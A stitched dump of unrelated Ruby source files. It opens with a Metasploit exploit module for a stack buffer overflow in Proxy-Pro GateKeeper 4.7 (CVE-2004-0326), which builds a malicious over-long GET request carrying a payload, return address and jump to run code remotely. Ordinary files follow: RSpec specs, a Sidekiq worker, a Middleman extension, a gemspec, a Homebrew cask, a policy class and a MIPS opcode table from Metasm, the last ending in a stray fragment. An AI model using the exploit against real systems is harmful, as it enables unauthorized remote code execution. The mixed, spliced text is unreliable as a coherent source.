# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
# Remote stack buffer overflow exploit for Proxy-Pro Professional
# GateKeeper 4.7 (CVE-2004-0326): an over-long HTTP GET to TCP/3128
# overwrites a saved pointer and redirects execution into the payload.
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Proxy-Pro Professional
GateKeeper 4.7. By sending a long HTTP GET to the default port
of 3128, a remote attacker could overflow a buffer and execute
arbitrary code.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2004-0326'],
['OSVDB', '4027'],
['BID', '9716'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00+&=%\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe
],
'Privileged' => true,
'DisclosureDate' => 'Feb 23 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(3128)
], self.class)
end
# Builds and sends the malicious GET request, then runs the session handler.
def exploit
connect
print_status("Trying target #{target.name}...")
# 3603 bytes of filler, then the payload, the target return address and
# a NOP pad. Presumably 3603 reaches the overwritten pointer -- the
# offsets are taken from the original advisory; do not alter.
sploit = "GET /" + rand_text_english(3603, payload_badchars)
sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)
# \xe9 <rel32>: a backwards jmp (-497) that lands inside the payload.
sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n"
sock.put(sploit)
sock.get_once(-1, 3)
handler
disconnect
end
end
| 24.243243 | 84 | 0.593645 |
614d95dcf4f3410594ead431b8ee3d0d2a596e4c | 506 | require 'rails_helper'
# Controller spec: the reserve index for a logged-in expert must expose
# only that expert's reserves and render the index template.
RSpec.describe Experts::ReservesController, type: :controller do
describe "予約一覧画面" do
before do
# reserve1 belongs to the logged-in expert; reserve2 to another one.
@reserve1 = FactoryBot.create(:reserve)
@reserve2 = FactoryBot.create(:reserve)
login_expert(@reserve1.expert)
end
it "予約一覧画面 予約が取得できていること テンプレートが表示されること" do
get :index
# Only the logged-in expert's reserve is assigned.
expect(assigns(:reserves)).to include @reserve1
expect(assigns(:reserves)).not_to include @reserve2
expect(response).to render_template :index
end
end
end
| 28.111111 | 64 | 0.705534 |
21f9497c15316a708402dbd4aee0edf5b006a9eb | 182 | # frozen_string_literal: true
module SensuPluginsChef
  # Semantic version components of the gem.
  module Version
    MAJOR = 7
    MINOR = 1
    PATCH = 1

    # Dotted version string, e.g. "7.1.1".
    VER_STRING = "#{MAJOR}.#{MINOR}.#{PATCH}"
  end
end
| 15.166667 | 56 | 0.659341 |
384f8457508fe270bf5d0e1e914c576725bab5a9 | 765 | class BufferedStreamClient
# Sidekiq worker that forwards feed actions to getstream.io.
# NOTE(review): @buffer is never assigned anywhere in this class, and
# Sidekiq instantiates workers fresh per job -- confirm where @buffer is
# supposed to come from before relying on the 'unfollow' branch.
class BufferActionWorker
include Sidekiq::Worker
sidekiq_options queue: 'soon'
# group/id identify the acting feed, method is the Stream client call to
# invoke, parameters are forwarded untouched.
def perform(group, id, method, *parameters)
if method == 'unfollow'
# Unfollows are pushed onto a buffer instead of hitting the API directly.
target_group, target_id, options = parameters
return @buffer.unfollow_buffer.push(
options.merge(
source: "#{group}:#{id}",
target: "#{target_group}:#{target_id}"
)
)
end
if group && id
Librato.increment("getstream.#{method}.total", feed_group: group)
StreamRails.client.feed(group, id).public_send(method, *parameters)
else
# No feed specified: invoke the method on the client itself.
Librato.increment("getstream.#{method}.total")
StreamRails.client.public_send(method, *parameters)
end
end
end
end
| 29.423077 | 75 | 0.622222 |
6227feaaadea75cd3f8cd31a44cdb6955a29ca50 | 2,322 | # frozen_string_literal: true
# Middleman extension that rewrites asset URLs inside rendered sources so
# they are served from a configured asset host (string or per-path Proc).
class Middleman::Extensions::AssetHost < ::Middleman::Extension
option :host, nil, 'The asset host to use or a Proc to determine asset host', required: true
option :exts, nil, 'List of extensions that get cache busters strings appended to them.'
option :sources, %w[.css .htm .html .js .mjs .php .xhtml], 'List of extensions that are searched for bustable assets.'
option :ignore, [], 'Regexes of filenames to skip adding query strings to'
option :rewrite_ignore, [], 'Regexes of filenames to skip processing for host rewrites'
def initialize(app, options_hash = ::Middleman::EMPTY_HASH, &block)
super
require 'set'
# Fall back to the app-wide asset extension list when :exts is unset.
@set_of_exts = Set.new(options.exts || app.config[:asset_extensions])
@set_of_sources = Set.new options.sources
end
# Attaches an InlineURLRewriter filter to every resource whose extension
# is in @set_of_sources, except those matching :rewrite_ignore.
Contract IsA['Middleman::Sitemap::ResourceListContainer'] => Any
def manipulate_resource_list_container!(resource_list)
resource_list.by_extensions(@set_of_sources).each do |r|
next if Array(options.rewrite_ignore || []).any? do |i|
::Middleman::Util.path_match(i, "/#{r.destination_path}")
end
r.add_filter ::Middleman::InlineURLRewriter.new(:asset_host,
app,
r,
after_filter: :asset_hash,
url_extensions: @set_of_exts,
ignore: options.ignore,
proc: method(:rewrite_url))
end
end
# Prepends the configured asset host to a single asset URL.
# Relative paths are resolved against the containing directory first.
Contract String, Or[String, Pathname], Any => String
def rewrite_url(asset_path, dirpath, _request_path)
uri = ::Middleman::Util.parse_uri(asset_path)
relative_path = uri.path[0..0] != '/'
full_asset_path = if relative_path
dirpath.join(asset_path).to_s
else
asset_path
end
# :host may be a Proc (called per asset path) or a plain String.
asset_prefix = case options[:host]
when Proc
options[:host].call(full_asset_path)
when String
options[:host]
end
File.join(asset_prefix, full_asset_path)
end
memoize :rewrite_url
end
| 40.736842 | 120 | 0.567614 |
1dcebd9598015a5c1d279be5c89ac29e1c1948ee | 1,272 | # coding: utf-8
# Make lib/ loadable so the version constant can be required below.
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'paperclip/av/transcoder/version'
# Gem specification for paperclip-av-transcoder.
Gem::Specification.new do |spec|
spec.name = "paperclip-av-transcoder"
spec.version = Paperclip::Av::Transcoder::VERSION
spec.authors = ["Omar Abdel-Wahab"]
spec.email = ["[email protected]"]
spec.summary = %q{Audio/Video Transcoder for Paperclip using FFMPEG/Avconv}
spec.description = %q{Audio/Video Transcoder for Paperclip using FFMPEG/Avconv}
spec.homepage = "https://github.com/ruby-av/paperclip-av-transcoder"
spec.license = "MIT"
# Package every git-tracked file; executables come from bin/.
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.6"
spec.add_development_dependency "rake"
spec.add_development_dependency "rspec", "~> 3.0.0"
spec.add_development_dependency "rails", ">= 4.0.0"
spec.add_development_dependency "sqlite3"
spec.add_development_dependency "coveralls"
spec.add_dependency "paperclip", ">=2.5.2"
spec.add_dependency "av", ">= 0.7.1"
end
| 41.032258 | 83 | 0.683962 |
4a61e583b3a2929be62954b070047263061fe8bf | 37 | module Fewer
# Released gem version string.
VERSION = '0.3.0'
end
| 9.25 | 19 | 0.648649 |
f86ad99e4473f34630045012d9e2e9c37d2c5cfd | 613 | cask "qlcolorcode" do
version "4.0.2"
sha256 "07d11cc54a28c2015b9cf298c4fe4a6fc3de14b9f2fd5f486de0d349fa4c3ee9"
# Release artifact is versioned via the tag in the download URL.
url "https://github.com/anthonygelibert/QLColorCode/releases/download/release-#{version}/QLColorCode.qlgenerator.zip"
appcast "https://github.com/anthonygelibert/QLColorCode/releases.atom"
name "QLColorCode"
desc "QuickLook plug-in that renders source code with syntax highlighting"
homepage "https://github.com/anthonygelibert/QLColorCode"
depends_on macos: ">= :catalina"
qlplugin "QLColorCode.qlgenerator"
# Leftover preferences removed on `brew uninstall --zap`.
zap trash: "~/Library/Preferences/org.n8gray.QLColorCode.plist"
end
| 36.058824 | 119 | 0.792822 |
1d399fef3f8ce75d1834788e8d954f1a65b0dd92 | 2,719 | require 'init_test'
require 'rest_client'
# Integration spec for the worker's embedded HTTP info server: boots a
# real server, registers two jobs, then exercises the worker/status and
# job endpoints over HTTP with basic-auth credentials from the config.
describe Patriot::Worker::InfoServer do
context "default config" do
before :all do
@config = config_for_test('worker')
port = @config.get(Patriot::Worker::InfoServer::PORT_KEY,
Patriot::Worker::InfoServer::DEFAULT_PORT)
@url = "http://127.0.0.1:#{port}"
username = @config.get(Patriot::Util::Config::USERNAME_KEY, "")
password = @config.get(Patriot::Util::Config::PASSWORD_KEY, "")
# Pre-computed Basic auth header for the PUT requests below.
@auth = 'Basic ' + Base64.encode64("#{username}:#{password}").chomp
@worker = Patriot::Worker::MultiNodeWorker.new(@config)
@job1 = TestEnvironment.build_job()
@job2 = TestEnvironment.build_job()
@job_store = @worker.instance_variable_get(:@job_store)
@update_id = Time.now.to_i
@job_store.register(@update_id, [@job1,@job2])
@info_server = @worker.instance_variable_get(:@info_server)
@info_server.start_server
# Give the server a moment to start accepting connections.
sleep 1
end
before :each do
# Each example starts from an ACTIVE worker.
@worker.instance_variable_set(:@status, Patriot::Worker::Status::ACTIVE)
end
after :all do
@info_server.shutdown_server
end
describe "WorkerServlet" do
it "should controll status (to be modified)" do
expect(@worker.instance_variable_get(:@status)).to eq Patriot::Worker::Status::ACTIVE
expect(RestClient.get("#{@url}/worker")).to match Patriot::Worker::Status::ACTIVE
resource = RestClient::Resource.new("#{@url}/worker/status")
resource.put({:status => Patriot::Worker::Status::SLEEP}, :Authorization => @auth )
expect(@worker.instance_variable_get(:@status)).to eq Patriot::Worker::Status::SLEEP
expect(RestClient.get("#{@url}/worker")).to match Patriot::Worker::Status::SLEEP
end
it "should controll worker status" do
expect(@worker.instance_variable_get(:@status)).to eq Patriot::Worker::Status::ACTIVE
expect(RestClient.get("#{@url}/worker/status")).to match Patriot::Worker::Status::ACTIVE
resource = RestClient::Resource.new("#{@url}/worker/status")
resource.put({:status => Patriot::Worker::Status::SLEEP}, :Authorization => @auth )
expect(@worker.instance_variable_get(:@status)).to eq Patriot::Worker::Status::SLEEP
expect(RestClient.get("#{@url}/worker/status")).to match Patriot::Worker::Status::SLEEP
end
end
describe "JobServlet" do
it "should return job status" do
job_status = RestClient.get("#{@url}/jobs/#{@job1.job_id}", :accept => :json)
json = JSON.parse(job_status)
expect(json["job_id"]).to eq @job1.job_id
expect(json["state"]).to eq Patriot::JobStore::JobState::WAIT
end
end
end
end
| 41.19697 | 96 | 0.653917 |
7941f213c09f858f7ded61b1d46cfc03f285eccd | 1,156 | # frozen_string_literal: true
require_relative '../base'
module Fusuma
  module Plugin
    module Parsers
      # Base class for parser plugins: rewrites a matching event's record
      # and tag in place, and passes every other event through untouched.
      # Subclasses override #parse_record.
      class Parser < Base
        # Convert the event when its tag matches #source.
        # When #parse_record returns nil the event is left unchanged.
        # @param event [Event]
        # @return [Event]
        def parse(event)
          return event unless event.tag == source

          converted = parse_record(event.record)
          return event if converted.nil?

          event.record = converted
          event.tag = tag
          event
        end

        # Tag of the events this parser consumes. Configurable through
        # config.yml; falls back to the plugin's DEFAULT_SOURCE constant.
        def source
          @source ||= config_params(:source) || self.class.const_get('DEFAULT_SOURCE')
        end

        # Tag applied to converted events: the underscored class basename.
        def tag
          @tag ||= self.class.name.split('::').last.underscore
        end

        # Hook for subclasses: return a converted Record, or nil to keep
        # the event as-is.
        # @param _record [Record]
        # @return [Record, nil]
        def parse_record(_record)
          nil
        end
      end
    end
  end
end
| 25.130435 | 86 | 0.58391 |
289449f6785436aafd113969e11c6f24cd4f97ca | 813 | # Be sure to restart your server when you modify this file.
# Add new inflection rules using the following format. Inflections
# are locale specific, and you may define rules for as many different
# locales as you wish. All of these examples are active by default:
# ActiveSupport::Inflector.inflections(:en) do |inflect|
# inflect.plural /^(ox)$/i, '\1en'
# inflect.singular /^(ox)en/i, '\1'
# inflect.irregular 'person', 'people'
# inflect.uncountable %w( fish sheep )
# end
# These inflection rules are supported but not enabled by default:
# ActiveSupport::Inflector.inflections(:en) do |inflect|
# inflect.acronym 'RESTful'
# end
ActiveSupport::Inflector.inflections(:en) do |inflect|
# Here you can put the singular and plural form you expect
# Pin the regatta/regattas pair explicitly so table and route names
# inflect consistently.
inflect.irregular 'regatta', 'regattas'
end
| 38.714286 | 69 | 0.734317 |
615932b8417ba650e56d7862463e0caf9be845f8 | 580 | class AppEnvironmentPolicy
# Format string for reserved-variable violations; frozen because it is a
# shared constant that is only ever read (via String#%).
RESERVED_ENV_VAR_ERROR_MSG = 'reserved_key:%s'.freeze
# Captures the app's errors collection and its parsed environment_json
# for later validation.
def initialize(app)
@errors = app.errors
@environment_json = app.environment_json
end
# Validates @environment_json:
# * nil is valid (nothing to check);
# * any non-Hash value is reported as :invalid_environment;
# * Hash keys starting with "vcap_"/"vmc_" (case-insensitive) are
#   reserved by the platform and reported via RESERVED_ENV_VAR_ERROR_MSG.
# Malformed JSON raised by the accessors surfaces as :invalid_json.
def validate
return if @environment_json.nil?
unless @environment_json.is_a?(Hash)
@errors.add(:environment_json, :invalid_environment)
return
end
# each_key avoids materialising an intermediate keys array.
@environment_json.each_key do |k|
@errors.add(:environment_json, RESERVED_ENV_VAR_ERROR_MSG % k) if k =~ /^(vcap|vmc)_/i
end
rescue MultiJson::ParseError
@errors.add(:environment_json, :invalid_json)
end
end
| 26.363636 | 92 | 0.717241 |
91728d0ce4eb08525cda07e558d9c8af78f7521a | 18,702 | # This file is part of Metasm, the Ruby assembly manipulation suite
# Copyright (C) 2007 Yoann GUILLOT
#
# Licence is LGPL, see LICENCE in the top-level directory
require 'metasm/mips/main'
# TODO coprocessors, floating point, 64bits, thumb mode
module Metasm
class MIPS
private
# Registers one opcode in @opcode_list.
# name:: mnemonic string; bin:: fixed encoding bits of the instruction.
# args:: mixes operand field symbols (those present in @fields_mask,
#        kept as operands) and property symbols from @valid_props
#        (:setip, :stopexec, ... stored as boolean props).
def addop(name, bin, *args)
o = Opcode.new name
o.bin = bin
# Operand fields are the args declared in @fields_mask.
o.args.concat(args & @fields_mask.keys)
# Remaining recognised symbols become boolean instruction properties.
(args & @valid_props).each { |p| o.props[p] = true }
if $DEBUG
# Surface any stray symbol that is neither a field nor a property.
a = (args - @valid_props - @fields_mask.keys)
p ['mips unhandled args', a] unless a.empty?
end
@opcode_list << o
end
# "Branch likely" opcodes: the delay slot executes only when the branch
# is taken. Deprecated in later MIPS revisions, declared for decoding.
def init_mips32_obsolete
addop 'beql', 0b010100 << 26, :rt, :rs, :i16, :setip # == , exec delay slot only if jump taken
addop 'bnel', 0b010101 << 26, :rt, :rs, :i16, :setip # !=
addop 'blezl',0b010110 << 26, :rt_z, :rs, :i16, :setip # <= 0
addop 'bgtzl',0b010111 << 26, :rt_z, :rs, :i16, :setip # > 0
addop 'bltzl',1 << 26 | 0b00010 << 16, :rs, :i16, :setip
addop 'bgezl',1 << 26 | 0b00011 << 16, :rs, :i16, :setip
addop 'bltzall', 1 << 26 | 0b10010 << 16, :rs, :i16, :setip
addop 'bgezall', 1 << 26 | 0b10011 << 16, :rs, :i16, :setip
end
# Opcodes occupying reserved or ASE-specific encoding slots, declared so
# the disassembler can name them instead of failing on unknown bits.
def init_mips32_reserved
addop 'future111011', 0b111011 << 26, :i26
%w[011000 011001 011010 011011 100111 101100 101101 110100 110111 111100 111111].each { |b|
addop "reserved#{b}", b.to_i(2) << 26, :i26
}
addop 'ase_jalx', 0b011101 << 26, :i26
addop 'ase011110', 0b011110 << 26, :i26
# TODO add all special/regimm/...
end
# Declares the base MIPS32 instruction set: operand field bit masks and
# shifts first, then every opcode, grouped as immediate/jump forms,
# loads/stores, SPECIAL, REGIMM, SPECIAL2 and CP0 encodings.
def init_mips32
@opcode_list = []
@fields_mask.update :rs => 0x1f, :rt => 0x1f, :rd => 0x1f, :sa => 0x1f,
:i16 => 0xffff, :i26 => 0x3ffffff, :rs_i16 => 0x3e0ffff, :it => 0x1f,
:ft => 0x1f, :idm1 => 0x1f, :idb => 0x1f, :sel => 7, :i20 => 0xfffff #, :i32 => 0
@fields_shift.update :rs => 21, :rt => 16, :rd => 11, :sa => 6,
:i16 => 0, :i26 => 0, :rs_i16 => 0, :it => 16,
:ft => 16, :idm1 => 11, :idb => 11, :sel => 0, :i20 => 6 #, :i32 => 0
init_mips32_obsolete
init_mips32_reserved
addop 'j', 0b000010 << 26, :i26, :setip, :stopexec # sets the program counter to (i26 << 2) | ((pc+4) & 0xfc000000) ie i26*4 in the 256M-aligned section containing the instruction in the delay slot
addop 'jal', 0b000011 << 26, :i26, :setip, :stopexec, :saveip # same thing, saves return addr in r31
addop 'mov', 0b001000 << 26, :rt, :rs # rt <- rs+0
addop 'addi', 0b001000 << 26, :rt, :rs, :i16 # add rt <- rs+i
addop 'li', 0b001001 << 26, :rt, :i16 # add $0 # XXX liu ?
addop 'addiu',0b001001 << 26, :rt, :rs, :i16 # add unsigned
addop 'slti', 0b001010 << 26, :rt, :rs, :i16 # set on less than
addop 'sltiu',0b001011 << 26, :rt, :rs, :i16 # set on less than unsigned
addop 'andi', 0b001100 << 26, :rt, :rs, :i16 # and
addop 'li', 0b001101 << 26, :rt, :i16 # or $0
addop 'ori', 0b001101 << 26, :rt, :rs, :i16 # or
addop 'xori', 0b001110 << 26, :rt, :rs, :i16 # xor
addop 'lui', 0b001111 << 26, :rt, :i16 # load upper
# addop 'li', (0b001111 << 26) << 32 | (0b001101 << 26), :rt_64, :i32 # lui + ori
addop 'b', 0b000100 << 26, :i16, :setip, :stopexec # bz $zero
addop 'bz', 0b000100 << 26, :rs, :i16, :setip # == 0 (beq $0)
addop 'bz', 0b000100 << 26, :rt, :i16, :setip # == 0
addop 'bnz', 0b000101 << 26, :rs, :i16, :setip # != 0
addop 'bnz', 0b000101 << 26, :rt, :i16, :setip # != 0
addop 'beq', 0b000100 << 26, :rt, :rs, :i16, :setip # ==
addop 'bne', 0b000101 << 26, :rt, :rs, :i16, :setip # !=
addop 'blez', 0b000110 << 26, :rs, :i16, :setip # <= 0
addop 'bgtz', 0b000111 << 26, :rs, :i16, :setip # > 0
addop 'lb', 0b100000 << 26, :rt, :rs_i16 # load byte rs <- [rt+i]
addop 'lh', 0b100001 << 26, :rt, :rs_i16 # load halfword
addop 'lwl', 0b100010 << 26, :rt, :rs_i16 # load word left
addop 'lw', 0b100011 << 26, :rt, :rs_i16 # load word
addop 'lbu', 0b100100 << 26, :rt, :rs_i16 # load byte unsigned
addop 'lhu', 0b100101 << 26, :rt, :rs_i16 # load halfword unsigned
addop 'lwr', 0b100110 << 26, :rt, :rs_i16 # load word right
addop 'sb', 0b101000 << 26, :rt, :rs_i16 # store byte
addop 'sh', 0b101001 << 26, :rt, :rs_i16 # store halfword
addop 'swl', 0b101010 << 26, :rt, :rs_i16 # store word left
addop 'sw', 0b101011 << 26, :rt, :rs_i16 # store word
addop 'swr', 0b101110 << 26, :rt, :rs_i16 # store word right
addop 'll', 0b110000 << 26, :rt, :rs_i16 # load linked word (read for atomic r/modify/w, sc does the w)
addop 'sc', 0b111000 << 26, :rt, :rs_i16 # store conditional word
addop 'lwc1', 0b110001 << 26, :ft, :rs_i16 # load word in fpreg low
addop 'swc1', 0b111001 << 26, :ft, :rs_i16 # store low fpreg word
addop 'lwc2', 0b110010 << 26, :rt, :rs_i16 # load word to copro2 register low
addop 'swc2', 0b111010 << 26, :rt, :rs_i16 # store low coproc2 register
addop 'ldc1', 0b110101 << 26, :ft, :rs_i16 # load dword in fpreg low
addop 'sdc1', 0b111101 << 26, :ft, :rs_i16 # store fpreg
addop 'ldc2', 0b110110 << 26, :rt, :rs_i16 # load dword to copro2 register
addop 'sdc2', 0b111110 << 26, :rt, :rs_i16 # store coproc2 register
addop 'pref', 0b110011 << 26, :it, :rs_i16 # prefetch (it = %w[load store r2 r3 load_streamed store_streamed load_retained store_retained
# r8 r9 r10 r11 r12 r13 r14 r15 r16 r17 r18 r19 r20 r21 r22 r23 r24 writeback_invalidate
# id26 id27 id28 id29 prepare_for_store id31]
addop 'cache',0b101111 << 26, :it, :rs_i16 # do things with the proc cache
# special
addop 'nop', 0
addop 'ssnop',1<<6
addop 'ehb', 3<<6
addop 'sll', 0b000000, :rd, :rt, :sa
addop 'movf', 0b000001, :rd, :rs, :cc
addop 'movt', 0b000001 | (1<<16), :rd, :rs, :cc
addop 'srl', 0b000010, :rd, :rt, :sa
addop 'sra', 0b000011, :rd, :rt, :sa
addop 'sllv', 0b000100, :rd, :rt, :rs
addop 'srlv', 0b000110, :rd, :rt, :rs
addop 'srav', 0b000111, :rd, :rt, :rs
addop 'jr', 0b001000, :rs, :setip, :stopexec # hint field ?
addop 'jr.hb',0b001000 | (1<<10), :rs, :setip, :stopexec
addop 'jalr', 0b001001 | (31<<11), :rs, :setip, :stopexec, :saveip # rd = r31 implicit
addop 'jalr', 0b001001, :rd, :rs, :setip, :stopexec, :saveip
addop 'jalr.hb', 0b001001 | (1<<10) | (31<<11), :rs, :setip, :stopexec, :saveip
addop 'jalr.hb', 0b001001 | (1<<10), :rd, :rs, :setip, :stopexec, :saveip
addop 'movz', 0b001010, :rd, :rs, :rt # rt == 0 ? rd <- rs
addop 'movn', 0b001011, :rd, :rs, :rt
addop 'syscall', 0b001100, :i20
addop 'break',0b001101, :i20, :stopexec
addop 'sync', 0b001111 # type 0 implicit
addop 'sync', 0b001111, :sa
addop 'mfhi', 0b010000, :rd # copies special reg HI to reg
addop 'mthi', 0b010001, :rd # copies reg to special reg HI
addop 'mflo', 0b010010, :rd # copies special reg LO to reg
addop 'mtlo', 0b010011, :rd # copies reg to special reg LO
addop 'mult', 0b011000, :rs, :rt # multiplies the registers and store the result in HI:LO
addop 'multu',0b011001, :rs, :rt
addop 'div', 0b011010, :rs, :rt
addop 'divu', 0b011011, :rs, :rt
addop 'add', 0b100000, :rd, :rs, :rt
addop 'addu', 0b100001, :rd, :rs, :rt
addop 'sub', 0b100010, :rd, :rs, :rt
addop 'subu', 0b100011, :rd, :rs, :rt
addop 'and', 0b100100, :rd, :rs, :rt
addop 'or', 0b100101, :rd, :rs, :rt
addop 'xor', 0b100110, :rd, :rs, :rt
addop 'not', 0b100111, :rd, :rt # nor $0
addop 'not', 0b100111, :rd, :rs
addop 'nor', 0b100111, :rd, :rs, :rt
addop 'slt', 0b101010, :rd, :rs, :rt # rs<rt ? rd<-1 : rd<-0
addop 'sltu', 0b101011, :rd, :rs, :rt
addop 'tge', 0b110000, :rs, :rt # rs >= rt ? trap
addop 'tgeu', 0b110001, :rs, :rt
addop 'tlt', 0b110010, :rs, :rt
addop 'tltu', 0b110011, :rs, :rt
addop 'teq', 0b110100, :rs, :rt
addop 'tne', 0b110110, :rs, :rt
# regimm
addop 'bltz', (1<<26) | (0b00000<<16), :rs, :i16, :setip
addop 'bgez', (1<<26) | (0b00001<<16), :rs, :i16, :setip
addop 'tgei', (1<<26) | (0b01000<<16), :rs, :i16, :setip
addop 'tgfiu',(1<<26) | (0b01001<<16), :rs, :i16, :setip
addop 'tlti', (1<<26) | (0b01010<<16), :rs, :i16, :setip
addop 'tltiu',(1<<26) | (0b01011<<16), :rs, :i16, :setip
addop 'teqi', (1<<26) | (0b01100<<16), :rs, :i16, :setip
addop 'tnei', (1<<26) | (0b01110<<16), :rs, :i16, :setip
addop 'bltzal', (1<<26) | (0b10000<<16), :rs, :i16, :setip
addop 'bgezal', (1<<26) | (0b10001<<16), :rs, :i16, :setip
# special2
addop 'madd', (0b011100<<26) | 0b000000, :rs, :rt
addop 'maddu',(0b011100<<26) | 0b000001, :rs, :rt
addop 'mul', (0b011100<<26) | 0b000010, :rd, :rs, :rt
addop 'msub', (0b011100<<26) | 0b000100, :rs, :rt
addop 'msubu',(0b011100<<26) | 0b000101, :rs, :rt
addop 'clz', (0b011100<<26) | 0b100000, :rd, :rs, :rt # must have rs == rt
addop 'clo', (0b011100<<26) | 0b100001, :rd, :rs, :rt # must have rs == rt
addop 'sdbbp',(0b011100<<26) | 0b111111, :i20
# cp0
addop 'mfc0', (0b010000<<26) | (0b00000<<21), :rt, :rd
addop 'mfc0', (0b010000<<26) | (0b00000<<21), :rt, :rd, :sel
addop 'mtc0', (0b010000<<26) | (0b00100<<21), :rt, :rd
addop 'mtc0', (0b010000<<26) | (0b00100<<21), :rt, :rd, :sel
addop 'tlbr', (0b010000<<26) | (1<<25) | 0b000001
addop 'tlbwi',(0b010000<<26) | (1<<25) | 0b000010
addop 'tlbwr',(0b010000<<26) | (1<<25) | 0b000110
addop 'tlbp', (0b010000<<26) | (1<<25) | 0b001000
addop 'eret', (0b010000<<26) | (1<<25) | 0b011000
addop 'deret',(0b010000<<26) | (1<<25) | 0b011111
addop 'wait', (0b010000<<26) | (1<<25) | 0b100000 # mode field ?
end
# MIPS32 Release 2 opcode table: starts from the plain MIPS32 table and
# adds the r2-only instructions (rotates, synci, bitfield ext/ins,
# byte-swap/sign-extend, shadow-register moves and interrupt enable/disable).
def init_mips32r2
init_mips32
# rotate right: immediate (sa) and register-variable forms
addop 'rotr', 0b000010 | (1<<21), :rd, :rt, :sa
addop 'rotrv',0b000110 | (1<<6), :rd, :rt, :rs
addop 'synci',(1<<26) | (0b11111<<16), :rs_i16
# special3
addop 'ext', (0b011111<<26) | 0b000000, :rt, :rs, :sa, :idm1
addop 'ins', (0b011111<<26) | 0b000100, :rt, :rs, :sa, :idb
addop 'rdhwr',(0b011111<<26)| 0b111011, :rt, :rd
addop 'wsbh',(0b011111<<26) | (0b00010<<6) | 0b100000, :rd, :rt
addop 'seb', (0b011111<<26) | (0b10000<<6) | 0b100000, :rd, :rt
addop 'seh', (0b011111<<26) | (0b11000<<6) | 0b100000, :rd, :rt
# cp0
addop 'rdpgpr', (0b010000<<26) | (0b01010<<21), :rd, :rt
addop 'wrpgpr', (0b010000<<26) | (0b01110<<21), :rd, :rt
# di/ei are encoded twice: with and without an explicit :rt operand
addop 'di', (0b010000<<26) | (0b01011<<21) | (0b01100<<11) | (0<<5)
addop 'di', (0b010000<<26) | (0b01011<<21) | (0b01100<<11) | (0<<5), :rt
addop 'ei', (0b010000<<26) | (0b01011<<21) | (0b01100<<11) | (1<<5)
addop 'ei', (0b010000<<26) | (0b01011<<21) | (0b01100<<11) | (1<<5), :rt
end
alias init_latest init_mips32r2
end
end
__END__
def macro_addop_cop1(name, bin, *aprops)
flds = [ :rt, :fs ]
addop name, :cop1, bin, 'rt, fs', flds, *aprops
end
def macro_addop_cop1_precision(name, type, bin, fmt, *aprops)
flds = [ :ft, :fs, :fd ]
addop name+'.'+(type.to_s[5,7]), type, bin, fmt, flds, *aprops
end
public
# Initialize the instruction set with the MIPS32 Instruction Set
def init_mips32
:cc => [7, 18, :fpcc],
:op => [0x1F, 16, :op ], :cp2_rt => [0x1F, 16, :cp2_reg ],
:stype => [0x1F, 6, :imm ],
:code => [0xFFFFF, 6, :code ],
:sel => [3, 0, :sel ]})
# ---------------------------------------------------------------
# COP0, field rs
# ---------------------------------------------------------------
addop 'mfc0', :cop0, 0b00000, 'rt, rd, sel', [ :rt, :rd, :sel ]
addop 'mtc0', :cop0, 0b00100, 'rt, rd, sel', [ :rt, :rd, :sel ]
# ---------------------------------------------------------------
# COP0 when rs=C0
# ---------------------------------------------------------------
macro_addop_cop0_c0 'tlbr', 0b000001
macro_addop_cop0_c0 'tlbwi', 0b000010
macro_addop_cop0_c0 'tlwr', 0b000110
macro_addop_cop0_c0 'tlbp', 0b001000
macro_addop_cop0_c0 'eret', 0b011000
macro_addop_cop0_c0 'deret', 0b011111
macro_addop_cop0_c0 'wait', 0b100000
# ---------------------------------------------------------------
# COP1, field rs
# ---------------------------------------------------------------
macro_addop_cop1 'mfc1', 0b00000
macro_addop_cop1 'cfc1', 0b00010
macro_addop_cop1 'mtc1', 0b00100
macro_addop_cop1 'ctc1', 0b00110
addop "bc1f", :cop1, 0b01000, 'cc, off', [ :cc, :off ], :diff_bits, [ 16, 3, 0 ]
addop "bc1fl", :cop1, 0b01000, 'cc, off', [ :cc, :off ], :diff_bits, [ 16, 3, 2 ]
addop "bc1t", :cop1, 0b01000, 'cc, off', [ :cc, :off ], :diff_bits, [ 16, 3, 1 ]
addop "bc1tl", :cop1, 0b01000, 'cc, off', [ :cc, :off ], :diff_bits, [ 16, 3, 3 ]
# ---------------------------------------------------------------
# COP1, field rs=S/D
# ---------------------------------------------------------------
[ :cop1_s, :cop1_d ].each do |type|
type_str = type.to_s[5,7]
macro_addop_cop1_precision 'add', type, 0b000000, 'fd, fs, ft'
macro_addop_cop1_precision 'sub', type, 0b000001, 'fd, fs, ft'
macro_addop_cop1_precision 'mul', type, 0b000010, 'fd, fs, ft'
macro_addop_cop1_precision 'abs', type, 0b000101, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'mov', type, 0b000110, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'neg', type, 0b000111, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'movz', type, 0b010010, 'fd, fs, ft'
macro_addop_cop1_precision 'movn', type, 0b010011, 'fd, fs, ft'
addop "movf.#{type_str}", type, 0b010001, 'fd, fs, cc', [ :cc, :fs, :fd ], :diff_bits, [ 16, 1, 0 ]
addop "movt.#{type_str}", type, 0b010001, 'fd, fs, cc', [ :cc, :fs, :fd ], :diff_bits, [ 16, 1, 1 ]
%w(f un eq ueq olt ult ole ule sf ngle seq ngl lt nge le ngt).each_with_index do |cond, index|
